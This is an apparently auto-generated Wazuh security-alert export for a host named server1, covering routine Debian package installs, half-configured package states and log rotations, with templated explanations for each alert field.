rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.18293
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured man-db:amd64 2.12.0-4build2
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  man-db
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  2.12.0-4build2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.680+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.680+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.18770
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:56 status installed man-db:amd64 2.12.0-4build2
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  man-db
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  2.12.0-4build2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.229+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.229+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.19233
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:00 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.19732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.20231
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status installed libarchive13t64:amd64 3.7.2-2ubuntu0.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.20716
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status half-configured libc-bin:amd64 2.39-0ubuntu8.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  libc-bin
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  2.39-0ubuntu8.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.21199
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status installed libc-bin:amd64 2.39-0ubuntu8.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  libc-bin
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  2.39-0ubuntu8.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.21668
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/auth.log'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.22022
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/syslog'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.22374
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/kern.log'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:06.251+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:06.251+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533386.22728
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:06 install linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:08.250+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:08.250+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533388.23170
